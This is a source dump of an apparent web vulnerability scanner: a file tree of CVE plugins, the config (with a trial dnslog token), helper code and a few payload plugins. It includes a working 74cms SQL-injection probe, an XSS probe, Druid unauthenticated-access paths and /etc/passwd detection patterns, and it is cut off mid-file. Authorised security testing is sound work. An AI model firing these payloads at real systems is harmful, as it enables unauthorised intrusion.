├── LICENSE ├── PluginManager.py ├── README.en-us.md ├── README.md ├── config.yaml ├── demo.py ├── lib ├── api │ ├── ceye_io.py │ ├── dns.py │ ├── dnslog_cn.py │ └── dnslog_pw.py ├── core │ ├── client.py │ └── coreScan.py ├── db │ └── secretKey_fast.txt ├── initial │ ├── banner.py │ ├── config.py │ ├── language.py │ ├── list.py │ ├── load.py │ └── parse.py ├── plugins │ ├── fingerprint │ │ ├── waf.py │ │ └── webapp.py │ └── shell.py ├── report │ ├── cat.html │ ├── cat.js │ ├── cat.ts │ └── output.py └── tool │ ├── check.py │ ├── color.py │ ├── head.py │ ├── logger.py │ ├── md5.py │ ├── thread.py │ └── timed.py ├── payloads ├── 74cms │ ├── 74cms-v5.0.1-sqlinject.py │ └── 74cms-v6.0.4-xss.py ├── AlibabaDruid │ └── alibaba-druid-unauth.py ├── AlibabaNacos │ └── alibaba-nacos-cve-2021-29441-unauth.py ├── ApacheAPISIX │ └── apache-apisix-cve-2020-13945-unauth.py ├── ApacheAirflow │ └── apache-airflow-cve-2020-17526-unauth.py ├── ApacheDruid │ ├── apache-druid-cve-2021-25646-rce.py │ └── apache-druid-cve-2021-36749-fileread.py ├── ApacheFlink │ └── apache-flink-cve-2020-17519-fileread.py ├── ApacheHadoop │ └── apache-hadoop-unauth.py ├── ApacheHttpd │ ├── apache-httpd-cve-2021-40438-ssrf.py │ ├── apache-httpd-cve-2021-41773-rce-fileread.py │ └── apache-httpd-cve-2021-42013-rce-fileread.py ├── ApacheSkyWalking │ └── apache-skywalking-cve-2020-9483-sqlinject.py ├── ApacheSolr │ ├── apache-solr-cve-2017-12629-rce.py │ ├── apache-solr-cve-2019-17558-rce.py │ ├── apache-solr-cve-2021-27905-ssrf-fileread.py │ └── tool_enable.py ├── ApacheTomcat │ └── apache-tomcat-cve-2017-12615-fileupload.py ├── ApacheUnomi │ └── apache-unomi-cve-2020-13942-rce.py ├── AppWeb │ └── appweb-cve-2018-8715-unauth.py ├── AtlassianConfluence │ ├── atlassian-confluence-cve-2015-8399-fileread-fileinclude.py │ ├── atlassian-confluence-cve-2019-3396-fileread.py │ ├── atlassian-confluence-cve-2021-26084-rce.py │ └── atlassian-confluence-cve-2022-26134-rce.py ├── Cisco │ └── cisco-cve-2020-3580-xss.py ├── Discuz │ └── discuz-wooyun-2010-080723-rce.py ├── Django │ ├── django-cve-2017-12794-xss.py │ ├── django-cve-2018-14574-redirect.py │ ├── django-cve-2019-14234-sqlinject.py │ ├── django-cve-2020-9402-sqlinject.py │ ├── django-cve-2021-35042-sqlinject.py │ └── tool_get_urlconf.py ├── Drupal │ ├── drupal-cve-2014-3704-sqlinject.py │ ├── drupal-cve-2017-6920-rce.py │ ├── drupal-cve-2018-7600-rce.py │ ├── drupal-cve-2018-7602-rce.py │ └── tool_get_token.py ├── ElasticSearch │ ├── elasticsearch-cve-2014-3120-rce.py │ ├── elasticsearch-cve-2015-1427-rce.py │ ├── elasticsearch-cve-2015-3337-fileread.py │ └── elasticsearch-cve-2015-5531-fileread.py ├── F5BIGIP │ ├── f5bigip-cve-2020-5902-rce-fileread.py │ └── f5bigip-cve-2022-1388-unauth-rce.py ├── Fastjson │ ├── fastjson-cnvd-2017-02833-rce.py │ ├── fastjson-cnvd-2019-22238-rce.py │ ├── fastjson-v1.2.62-rce.py │ └── fastjson-v1.2.66-rce.py ├── Gitea │ └── gitea-unauth-fileread-rce.py ├── Gitlab │ ├── gitlab-cve-2021-22205-rce.py │ └── gitlab-cve-2021-22214-ssrf.py ├── GoCD │ └── gocd-cve-2021-43287-fileread.py ├── Grafana │ └── grafana-cve-2021-43798-fileread.py ├── Influxdb │ └── influxdb-unauth.py ├── JBoss │ └── jboss-unauth.py ├── Jenkins │ ├── jenkins-cve-2018-1000861-rce.py │ └── jenkins-unauth.py ├── Jetty │ ├── jetty-cve-2021-28164-dsinfo.py │ ├── jetty-cve-2021-28169-dsinfo.py │ └── jetty-cve-2021-34429-dsinfo.py ├── Joomla │ ├── joomla-cve-2017-8917-sqlinject.py │ └── joomla-cve-2023-23752-unauth.py ├── Jupyter │ └── jupyter-unauth.py ├── Keycloak │ └── keycloak-cve-2020-10770-ssrf.py ├── Landray │ └── landray-oa-cnvd-2021-28277-ssrf-fileread.py ├── MiniHttpd │ └── minihttpd-cve-2018-18778-fileread.py ├── MongoExpress │ └── mongoexpress-cve-2019-10758-rce.py ├── Nexus │ ├── nexus-cve-2019-15588-rce.py │ ├── nexus-cve-2019-5475-rce.py │ ├── nexus-cve-2019-7238-rce.py │ ├── nexus-cve-2020-10199-rce.py │ ├── nexus-cve-2020-10204-rce.py │ └── tool_get_yumid.py ├── NodeRED │ └── nodered-cve-2021-3223-fileread.py ├── Nodejs │ ├── nodejs-cve-2017-14849-fileread.py │ └── nodejs-cve-2021-21315-rce.py ├── RubyOnRails │ ├── ruby-on-rails-cve-2018-3760-fileread.py │ ├── ruby-on-rails-cve-2019-5418-fileread.py │ ├── ruby-on-rails-cve-2020-8163-rce.py │ └── tool_get_route_path.py ├── ShowDoc │ └── showdoc-cnvd-2020-26585-fileupload.py ├── Spring │ ├── spring-boot-cve-2021-21234-fileread.py │ ├── spring-cloud-config-cve-2020-5410-fileread.py │ ├── spring-cloud-function-cve-2022-22963-rce.py │ ├── spring-cloud-gateway-cve-2022-22947-rce.py │ ├── spring-cve-2022-22965-rce.py │ ├── spring-data-commons-cve-2018-1273-rce.py │ ├── spring-data-rest-cve-2017-8046-rce.py │ └── spring-security-oauth-cve-2016-4977-rce.py ├── Supervisor │ └── supervisor-cve-2017-11610-rce.py ├── ThinkPHP │ ├── main.txt │ ├── thinkphp-2.x-rce.py │ ├── thinkphp-5-ids-sqlinject.py │ ├── thinkphp-cnnvd-201901-445-rce.py │ ├── thinkphp-cnvd-2018-24942-rce.py │ ├── thinkphp-cnvd-2022-86535-rce.py │ └── thinkphp-cve-2018-1002015-rce.py ├── Ueditor │ └── ueditor-ssrf.py ├── VMware │ ├── test.tar │ ├── vmware-vcenter-2020-10-fileread.py │ └── vmware-vcenter-cve-2021-21972-fileupload-rce.py ├── Weblogic │ ├── oracle-weblogic-cve-2014-4210-ssrf.py │ ├── oracle-weblogic-cve-2017-10271-unserialize.py │ ├── oracle-weblogic-cve-2019-2725-unserialize.py │ ├── oracle-weblogic-cve-2020-14750-bypass.py │ ├── oracle-weblogic-cve-2020-14882-rce-unauth.py │ └── oracle-weblogic-cve-2021-2109-rce.py ├── Webmin │ ├── webmin-cve-2019-15107-rce.py │ └── webmin-cve-2019-15642-rce.py ├── Yonyou │ ├── yonyou-erp-nc-ncfindweb-fileread.py │ ├── yonyou-grp-u8-cnnvd-201610-923-sqlinject.py │ ├── yonyou-nc-cnvd-2021-30167-rce.py │ ├── yonyou-u8-oa-getsession-dsinfo.py │ └── yonyou-u8-oa-test.jsp-sqlinject.py ├── Zabbix │ └── zabbix-cve-2016-10134-sqlinject.py ├── phpMyadmin │ ├── phpmyadmin-cve-2018-12613-fileinclude-fileread.py │ └── phpmyadmin-wooyun-2016-199433-unserialize.py ├── phpUint │ └── phpunit-cve-2017-9841-rce.py └── uWSGIPHP │ └── uwsgiphp-cve-2018-7490-fileread.py ├── requirements.txt ├── thirdparty ├── HackRequests │ ├── HackRequests.py │ └── __init__.py ├── colorama │ ├── __init__.py │ ├── ansi.py │ ├── ansitowin32.py │ ├── initialise.py │ ├── win32.py │ └── winterm.py ├── flask_unsign │ ├── __init__.py │ ├── __main__.py │ ├── cracker.py │ ├── exceptions.py │ ├── helpers.py │ ├── logger.py │ └── session.py ├── requests │ ├── __init__.py │ ├── __version__.py │ ├── _internal_utils.py │ ├── adapters.py │ ├── api.py │ ├── auth.py │ ├── certs.py │ ├── compat.py │ ├── cookies.py │ ├── exceptions.py │ ├── help.py │ ├── hooks.py │ ├── models.py │ ├── packages.py │ ├── sessions.py │ ├── status_codes.py │ ├── structures.py │ └── utils.py └── tqdm │ ├── __init__.py │ ├── __main__.py │ ├── _dist_ver.py │ ├── _main.py │ ├── _monitor.py │ ├── _tqdm.py │ ├── _tqdm_gui.py │ ├── _tqdm_notebook.py │ ├── _tqdm_pandas.py │ ├── _utils.py │ ├── asyncio.py │ ├── auto.py │ ├── autonotebook.py │ ├── cli.py │ ├── completion.sh │ ├── contrib │ ├── __init__.py │ ├── __pycache__ │ │ ├── __init__.cpython-38.pyc │ │ ├── bells.cpython-38.pyc │ │ ├── concurrent.cpython-38.pyc │ │ ├── discord.cpython-38.pyc │ │ ├── itertools.cpython-38.pyc │ │ ├── logging.cpython-38.pyc │ │ ├── telegram.cpython-38.pyc │ │ └── utils_worker.cpython-38.pyc │ ├── bells.py │ ├── concurrent.py │ ├── discord.py │ ├── itertools.py │ ├── logging.py │ ├── telegram.py │ └── utils_worker.py │ ├── dask.py │ ├── gui.py │ ├── keras.py │ ├── notebook.py │ ├── rich.py │ ├── std.py │ ├── tk.py │ ├── tqdm.1 │ ├── utils.py │ └── version.py └── vulcat.py /config.yaml: -------------------------------------------------------------------------------- 1 | # 语言, 默认为英文en-us, 中文为zh-cn 2 | language: en-us 3 | 4 | # ceye.io的域名和token 5 | ceye-domain: Null 6 | ceye-token: Null 7 | 8 | # dnslog.pw的域名和token 9 | # 默认带有试用域名和Token, 会过期, 可以替换为自己的 10 | dnslog-pw-domain: im4v3kv9.dnslog.pw 11 | dnslog-pw-token: 1221dd92 12 | 13 | # 请求Header 14 | # 运行时指定--user-agent参数, 会覆盖config.yaml的User-Agent 15 | headers: 16 | User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36" 17 | Content-Type: "application/x-www-form-urlencoded" 18 | Accept: "*/*" 19 | Connection: "close" 20 | 21 | payloads-path: ./payloads/ 22 | -------------------------------------------------------------------------------- /demo.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from PluginManager import Vuln_Scan 5 | 6 | class Scan(Vuln_Scan): 7 | def __init__(self): 8 | pass 9 | 10 | def POC(self, clients): 11 | pass 12 | 13 | def EXP(self, clients): 14 | pass 15 | 16 | def Start(self, clients): 17 | return self.POC(clients) 18 | -------------------------------------------------------------------------------- /lib/api/ceye_io.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from thirdparty import requests 5 | 6 | def get_ceye_domain(self): 7 | return self.ceye_domain 8 | 9 | 10 | def get_ceye_result(self, md): 11 | res = requests.get( 12 | self.ceye_result + md, 13 | timeout=self.timeout, 14 | verify=False 15 | ) 16 | if (md in res.text): 17 | return True # * 无回显漏洞验证-成功 18 | else: 19 | return False # * 无回显漏洞验证-失败 20 | -------------------------------------------------------------------------------- /lib/api/dnslog_cn.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from thirdparty import requests 5 | 6 | def get_dnslog_cn_domain(self, sessid): 7 | headers = self.dnslog_cn_headers.copy() 8 | headers['Cookie'] = 'PHPSESSID=' + sessid 9 | res = requests.get( 10 | self.dnslog_cn_domain, 11 | timeout=self.timeout, 12 | headers=headers, 13 | verify=False 14 | ) 15 | domain = res.text 16 | return domain 17 | 18 | def get_dnslog_cn_result(self, md, sessid): 19 | headers = self.dnslog_cn_headers.copy() 20 | headers['Cookie'] = 'PHPSESSID=' + sessid 21 | res = requests.get( 22 | self.dnslog_cn_result, 23 | timeout=self.timeout, 24 | headers=headers, 25 | verify=False 26 | ) 27 | if (md in res.text): 28 | return True # * 无回显漏洞验证-成功 29 | else: 30 | return False # * 无回显漏洞验证-失败 31 | -------------------------------------------------------------------------------- /lib/api/dnslog_pw.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from thirdparty import requests 5 | 6 | def get_dnslog_pw_domain(self): 7 | return self.dnslog_pw_domain 8 | 9 | def get_dnslog_pw_result(self, md): 10 | domains = self.dnslog_pw_domain.split('.') # * 分隔域名 11 | username = domains[-3] # * 获取域名中的 用户名 部分 12 | 13 | pw_result = self.dnslog_pw_result.format( 14 | username=username, 15 | prefix=self.pw_random_prefix, 16 | token=self.dnslog_pw_token 17 | ) 18 | 19 | res = requests.get( 20 | pw_result, 21 | timeout=self.timeout, 22 | verify=False 23 | ) 24 | 25 | # * 存在记录则dnslog.pw会返回True 26 | # * 不存在则返回False 27 | if (md in res.text): 28 | return True # * 无回显漏洞验证-成功 29 | else: 30 | return False # * 无回显漏洞验证-失败 31 | -------------------------------------------------------------------------------- /lib/initial/banner.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from lib.tool import color 5 | from random import randint 6 | 7 | banner_0 = ''' 8 | ___ _____ 9 | _ _ _ _ | | ____ ____ [_____] 10 | | \ / /| | | | | | / ___) / _ ] | | 11 | \ \/ / | (_/ | | |__ ( (___ ( [_] | | | 12 | \__/ (____ ]/[_____] \____) \____]/ [_] 13 | ''' 14 | 15 | banner_1 = ''' 16 | ___ _____ 17 | _ _ _ _ | | ____ ____ [_____] 18 | | \ / /| | | | | | / ___) / _ ] | | 19 | \ \/ / | (_/ | | |__ ( (___ ( [_] | | | n_n 20 | \__/ (__・ ・}/[_____] \____) \____]/ [_](• •)/ 21 | ''' 22 | 23 | banner_2 = ''' 24 | ___ _____ 25 | _ _ _ _ | | ____ ____ [_____] 26 | | \ / /| | | | | | u_u/ ___) / _ ] | | 27 | \ \/ / | (_/ | | |_・ ・}(___ ( [_] | | | 28 | \__/ (____ ]/[_____] \____) \_• •)/ [_] 29 | ''' 30 | 31 | # banner_3 = ''' 32 | # ___ _____ 33 | # _ _ _ _ | | ____ ____ [_____] 34 | # | \ / /| | | | | | / ___) / ・ ・} | | 35 | # \ \/ / | (_/ | | |__ ( (___ ( [_] | | | 36 | # \__/ (____ ]/[_____] \_• •) \____]/ [_] 37 | # ''' 38 | 39 | def banner(): 40 | num = randint(0, 2) 41 | banner_x = eval('banner_' + str(num)) 42 | print(color.red_ex(banner_x), end=color.reset('\n')) -------------------------------------------------------------------------------- /lib/initial/load.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | import yaml 5 | 6 | def load_yaml(): 7 | f = open('config.yaml', 'r', encoding='utf-8') 8 | config_yaml = yaml.load(f, yaml.FullLoader) 9 | f.close 10 | 11 | return config_yaml -------------------------------------------------------------------------------- /lib/tool/check.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env /python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | 检查 6 | 无法连接至目标url 7 | 连接目标url超时 8 | 检查poc误报 9 | 例如直接输出payload在页面中的情况 10 | 参考: https://github.com/zhzyker/vulmap/blob/main/core/verify.py 11 | 检查文件读取漏洞 12 | ''' 13 | 14 | from lib.initial.config import config 15 | import re 16 | 17 | def check_connect(client): 18 | info = { 19 | 'app_name': 'Check', 20 | 'vul_id': 'check-connection' 21 | } 22 | 23 | res = client.request( 24 | 'get', 25 | '', 26 | allow_redirects=False, 27 | vul_info=info 28 | ) 29 | if res is None: 30 | return False 31 | 32 | return True 33 | 34 | def check_res(resText, md, command='echo'): 35 | ''' 检查RCE-poc误报 36 | 来自: https://github.com/zhzyker/vulmap/blob/main/core/verify.py 37 | ''' 38 | res_info = command + ".{1,20}" + md 39 | 40 | if(re.search(res_info, resText) != None): 41 | return False # * 回显异常, 误报 42 | else: 43 | if (md in resText): 44 | return True # * 正确回显, 存在漏洞 45 | else: 46 | return False # * 错误回显, 不存在漏洞 47 | 48 | def check_res_fileread(resText, resHeaders=None): 49 | ''' 检查回显, 判断是否存在 FileRead(任意文件读取) 漏洞 50 | :param resText: 要检测的响应内容 51 | :param resHeaders(可选参数): 要检测的响应头 52 | 53 | * /etc/passwd 54 | r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root' 55 | * C:/Windows/System32/drivers/etc/hosts 56 | 'Microsoft Corp' and 'Microsoft TCP/IP for Windows' 57 | * C:/Windows/win.ini 58 | '; for 16-bit app support 59 | ''' 60 | 61 | if ( # * 检查响应Body 62 | re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', resText, re.I|re.M|re.S) 63 | or (('Microsoft Corp' in resText) and ('Microsoft TCP/IP for Windows' in resText)) 64 | or ('; for 16-bit app support' in resText) 65 | ): 66 | return True 67 | 68 | elif ( # * 检查响应Headers 69 | re.search(r'root:(x{1}|.*):\d{1,7}:\d{1,7}:root', str(resHeaders), re.I|re.M|re.S) 70 | or (('Microsoft Corp' in str(resHeaders)) and ('Microsoft TCP/IP for Windows' in str(resHeaders))) 71 | or ('; for 16-bit app support' in str(resHeaders)) 72 | ): 73 | return True 74 | 75 | return False # * 没有找到文件回显, 不存在FileRead漏洞 76 | -------------------------------------------------------------------------------- /lib/tool/color.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from thirdparty.colorama import init, Fore, Back, Style 5 | 6 | init() # * 初始化, 使Windows机器也能正常显示颜色 7 | 8 | def reset(s = ''): 9 | return Fore.RESET + s 10 | 11 | def red(s = ''): # * 红色 12 | return Fore.RED + s 13 | 14 | def green(s = ''): # * 绿色 15 | return Fore.GREEN + s 16 | 17 | def cyan(s = ''): # * 青蓝 18 | return Fore.CYAN + s 19 | 20 | def black_ex(s = ''): # * 黑色(高亮) 21 | return Fore.LIGHTBLACK_EX + s 22 | 23 | def red_ex(s = ''): # * 红色(高亮) 24 | return Fore.LIGHTRED_EX + s 25 | 26 | def green_ex(s = ''): # * 绿色(高亮) 27 | return Fore.LIGHTGREEN_EX + s 28 | 29 | def yellow_ex(s = ''): # * 黄色(高亮) 30 | return Fore.LIGHTYELLOW_EX + s 31 | 32 | def blue_ex(s = ''): # * 蓝色(高亮) 33 | return Fore.LIGHTBLUE_EX + s 34 | 35 | def magenta_ex(s = ''): # * 紫色(高亮) 36 | return Fore.LIGHTMAGENTA_EX + s 37 | 38 | def cyan_ex(s = ''): # * 青蓝(高亮) 39 | return Fore.LIGHTCYAN_EX + s 40 | 41 | 42 | 43 | 44 | 45 | 46 | # from colorama import init 47 | # from colorama import Fore, Back, Style 48 | # from termcolor import colored 49 | 50 | # # use Colorama to make Termcolor work on Windows too 51 | # init() 52 | # print(Fore.MAGENTA + 'some red text') 53 | # # then use Termcolor for all colored text output 54 | # print(Fore.BLACK + 'some red text') 55 | # print(Fore.RED + 'some red text') 56 | # print(Fore.GREEN + 'some red text') 57 | # print(Fore.YELLOW + 'some red text') 58 | # print(Fore.BLUE + 'some red text') 59 | # print(Fore.CYAN + 'some red text') 60 | # print(Fore.MAGENTA + 'some red text') 61 | # print('---------------------------------') 62 | # print(Fore.LIGHTBLACK_EX + 'some red text') 63 | # print(Fore.LIGHTRED_EX + 'some red text') 64 | # print(Fore.LIGHTGREEN_EX + 'some red text') 65 | # print(Fore.LIGHTYELLOW_EX + 'some red text') 66 | # print(Fore.LIGHTBLUE_EX + 'some red text') 67 | # print(Fore.LIGHTCYAN_EX + 'some red text') 68 | # print(Fore.LIGHTMAGENTA_EX + 'some red text') -------------------------------------------------------------------------------- /lib/tool/head.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env /python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Headers请求头处理 6 | 合并2个headers 7 | ''' 8 | 9 | def merge(old_headers, new_headers): 10 | ''' 11 | 用于合并2个headers, 并返回合并后的headers, 新headers将会覆盖旧headers中的同名内容. 12 | ''' 13 | 14 | merge_headers = old_headers.copy() 15 | merge_headers.update(new_headers) 16 | return merge_headers -------------------------------------------------------------------------------- /lib/tool/md5.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | md5 6 | ''' 7 | 8 | import hashlib 9 | import random 10 | 11 | def md5(app_name, num=6): 12 | ''' 字符串md5加密, 默认返回前6位, 最大32 ''' 13 | md = hashlib.md5() 14 | md.update(app_name.encode('utf-8')) 15 | 16 | return md.hexdigest()[:num] 17 | 18 | def random_md5(len=8): 19 | ''' 生成随机md5值, 默认返回前8位, 最大32 ''' 20 | random_number = str(random.randint(0, 99999999)) 21 | md = hashlib.md5() 22 | md.update(random_number.encode('utf-8')) 23 | 24 | return md.hexdigest()[:len] 25 | 26 | def random_int_1(len = 4): 27 | ''' 返回1个随机整数, 默认范围1234-5678 28 | @param len 29 | 随机数长度, 默认为4, 最小为1, 最大为6 30 | 范围 31 | 1-9 32 | 10-99 33 | 100-999 34 | 1234-5678 35 | 12345-56789 36 | 123456-567890 37 | ''' 38 | 39 | num_list_1 = [0, 1, 10, 100, 1234, 12345, 123456] 40 | num_list_2 = [0, 9, 99, 999, 5678, 56789, 567890] 41 | 42 | num1 = random.randint(num_list_1[len], num_list_2[len]) 43 | 44 | return num1 45 | 46 | def random_int_2(len = 4): 47 | ''' 返回2个随机整数, 默认范围1234-5678 48 | @param len 49 | 随机数长度, 默认为4, 最小为1, 最大为6 50 | 范围 51 | 1-9 52 | 10-99 53 | 100-999 54 | 1234-5678 55 | 12345-56789 56 | 123456-567890 57 | ''' 58 | 59 | num_list_1 = [0, 1, 10, 100, 1234, 12345, 123456] 60 | num_list_2 = [0, 9, 99, 999, 5678, 56789, 567890] 61 | 62 | num1 = random.randint(num_list_1[len], num_list_2[len]) 63 | num2 = random.randint(num_list_1[len], num_list_2[len]) 64 | 65 | return num1, num2 66 | 67 | def random_num(len = 32): 68 | ''' 生成随机32位数字, 并以字符串形式返回 69 | 范围12345678901234567890123456789012 --> 99999999999999999999999999999999 70 | :param len: 返回数字的长度 71 | ''' 72 | 73 | numStart = 12345678901234567890123456789012 74 | numEnd = 99999999999999999999999999999999 75 | 76 | num = random.randint(numStart, numEnd) 77 | return str(num)[:len] 78 | -------------------------------------------------------------------------------- /lib/tool/thread.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | threading没有返回结果的功能 6 | 重新创建一个threads类, 继承自threading.Thread 7 | 添加返回结果的功能get_result() 8 | ''' 9 | 10 | from threading import Thread 11 | 12 | class thread(Thread): 13 | def __init__(self, target, clients): 14 | super(thread, self).__init__() 15 | self.target = target 16 | self.clients = clients 17 | 18 | def run(self): 19 | self.result = self.target(self.clients) 20 | 21 | def get_result(self): # * 返回子线程扫描结果 22 | try: 23 | return self.result # * 如果子线程不使用join()方法,此处可能会报没有self.result的错误 24 | except Exception: 25 | return None -------------------------------------------------------------------------------- /lib/tool/timed.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | from lib.tool import color 5 | import time as t 6 | 7 | # def nowtime(): 8 | # localtime = t.strftime('%H:%M:%S', t.localtime()) 9 | # print(blue_ex('[{}] '.format(localtime)), end='') 10 | 11 | def nowtime(): 12 | ''' 返回当前时间(时:分:秒)''' 13 | localtime = t.strftime('%H:%M:%S', t.localtime()) 14 | return color.blue_ex('[{}] '.format(localtime)) 15 | 16 | def nowtime_year(): 17 | ''' 返回当前时间(年-月-日 时:分:秒)''' 18 | localtime_year = t.strftime('%Y-%m-%d %H:%M:%S', t.localtime()) 19 | return localtime_year 20 | 21 | def custom_time(timeFormat: str): 22 | ''' 自定义时间格式并返回 ''' 23 | customTime = t.strftime(timeFormat, t.localtime()) 24 | return customTime 25 | 26 | def getTime(): 27 | ''' 返回当前的时间戳, int类型 ''' 28 | return int(t.time()) 29 | -------------------------------------------------------------------------------- /payloads/74cms/74cms-v5.0.1-sqlinject.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | 74cms 5.0.1 前台AjaxPersonalController.class.php存在SQL注入 6 | 暂无编号 7 | Payload: https://github.com/chaitin/xray/blob/master/pocs/74cms-sqli.yml 8 | ''' 9 | 10 | from PluginManager import Vuln_Scan 11 | from lib.tool.md5 import md5, random_int_1 12 | 13 | class Scan(Vuln_Scan): 14 | def __init__(self): 15 | self.payloads = [ 16 | {'path': 'index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'}, 17 | {'path': 'upload/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5({RANNUM}))) -- a'}, 18 | ] 19 | 20 | def POC(self, clients): 21 | client = clients.get('reqClient') 22 | 23 | vul_info = { 24 | 'app_name': '74cms', 25 | 'vul_type': 'SQLinject', 26 | 'vul_id': '74cms-v5.0.1-sqlinject', 27 | } 28 | 29 | for payload in self.payloads: 30 | randomNum = random_int_1(6) # * 随机6位数字 31 | 32 | path = payload['path'].format(RANNUM=randomNum) 33 | 34 | res = client.request( 35 | 'get', 36 | path, 37 | allow_redirects=False, 38 | vul_info=vul_info 39 | ) 40 | if res is None: 41 | continue 42 | 43 | md = md5(str(randomNum), 31) # * 计算随机数字的md5值, 取31位(0-30) 44 | 45 | if (md in res.text): 46 | results = { 47 | 'Target': res.url, 48 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 49 | 'Request': res 50 | } 51 | return results 52 | return None 53 | 54 | def EXP(self, clients): 55 | pass 56 | 57 | def Start(self, clients): 58 | return self.POC(clients) 59 | -------------------------------------------------------------------------------- /payloads/74cms/74cms-v6.0.4-xss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | 74CMS-v6.0.4版本 帮助中心搜索框处存在XSS 6 | 暂无编号 7 | Payload: https://www.freebuf.com/vuls/284537.html 8 | ''' 9 | 10 | from PluginManager import Vuln_Scan 11 | from lib.tool.md5 import random_int_1 12 | 13 | randomNum = random_int_1(6) 14 | 15 | class Scan(Vuln_Scan): 16 | def __init__(self): 17 | self.payloads = [ 18 | {'path': 'index.php?m=&c=help&a=help_list&key=1%253csvg/onload%253dconfirm%2528{TEXT}%2529%253E2&__hash__=1'}, 19 | {'path': 'index.php?m=&c=help&a=help_list&key=137244gq1lw%253csvg/onload%253dconfirm%2528{TEXT}%2529%253Edutvxlqd4lq&__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88'}, 20 | ] 21 | 22 | def POC(self, clients): 23 | client = clients.get('reqClient') 24 | 25 | vul_info = { 26 | 'app_name': '74cms', 27 | 'vul_type': 'XSS', 28 | 'vul_id': '74cms-v6.0.4-xss', 29 | } 30 | 31 | for payload in self.payloads: 32 | path = payload['path'].format(TEXT=randomNum) 33 | 34 | res = client.request( 35 | 'get', 36 | path, 37 | allow_redirects=False, 38 | vul_info=vul_info 39 | ) 40 | if res is None: 41 | continue 42 | 43 | md = '' 44 | 45 | if (md in res.text): 46 | results = { 47 | 'Target': res.url, 48 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 49 | 'Request': res 50 | } 51 | return results 52 | return None 53 | 54 | def EXP(self, clients): 55 | pass 56 | 57 | def Start(self, clients): 58 | return self.POC(clients) 59 | -------------------------------------------------------------------------------- /payloads/AlibabaDruid/alibaba-druid-unauth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | druid未授权访问漏洞 6 | 攻击者可利用druid管理面板, 查看Session信息, 并利用泄露的Session登录后台(有时候可能没有Session) 7 | 暂无编号 8 | ''' 9 | 10 | from PluginManager import Vuln_Scan 11 | 12 | class Scan(Vuln_Scan): 13 | def __init__(self): 14 | self.payloads = [ 15 | {'path': ''}, 16 | {'path': 'druid/index.html'}, 17 | {'path': 'druid/api.html'}, 18 | {'path': 'index.html'}, 19 | {'path': 'api.html'}, 20 | # {'path': 'druid/datasource.html'}, 21 | # {'path': 'druid/sql.html'}, 22 | # {'path': 'druid/wall.html'}, 23 | # {'path': 'druid/basic.json'}, 24 | ] 25 | 26 | def POC(self, clients): 27 | client = clients.get('reqClient') # * Requests Client 28 | 29 | vul_info = { 30 | 'app_name': 'AlibabaDruid', 31 | 'vul_type': 'unAuthorized', 32 | 'vul_id': 'alibaba-druid-unauth', 33 | } 34 | 35 | for payload in self.payloads: # * Payload 36 | path = payload['path'] # * Path 37 | 38 | res = client.request( 39 | 'get', 40 | path, 41 | vul_info=vul_info 42 | ) 43 | if res is None: 44 | continue 45 | 46 | if ( 47 | (('Druid Stat Index' in res.text) 48 | and ('druid.index' in res.text)) 49 | or (('Druid Stat JSON API' in res.text) 50 | and ('druid.common' in res.text)) 51 | # or (('Druid DataSourceStat' in res.text) 52 | # and ('druid.datasource' in res.text)) 53 | # or (('Druid SQL Stat' in res.text) 54 | # and ('druid.sql' in res.text)) 55 | # or (('Druid DataSourceStat' in res.text) 56 | # and ('druid.wall' in res.text)) 57 | ): 58 | results = { 59 | 'Target': res.request.url, 60 | 'Type': [vul_info['app_name'], vul_info['vul_type'], vul_info['vul_id']], 61 | 'Request': res 62 | } 63 | return results 64 | return None 65 | 66 | def EXP(self, clients): 67 | pass 68 | 69 | def Start(self, clients): 70 | return self.POC(clients) 71 | -------------------------------------------------------------------------------- /payloads/ApacheFlink/apache-flink-cve-2020-17519-fileread.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # -*- coding:utf-8 -*- 3 | 4 | ''' 5 | Flink 任意文件读取 6 | CVE-2020-17519 7 | Payload: 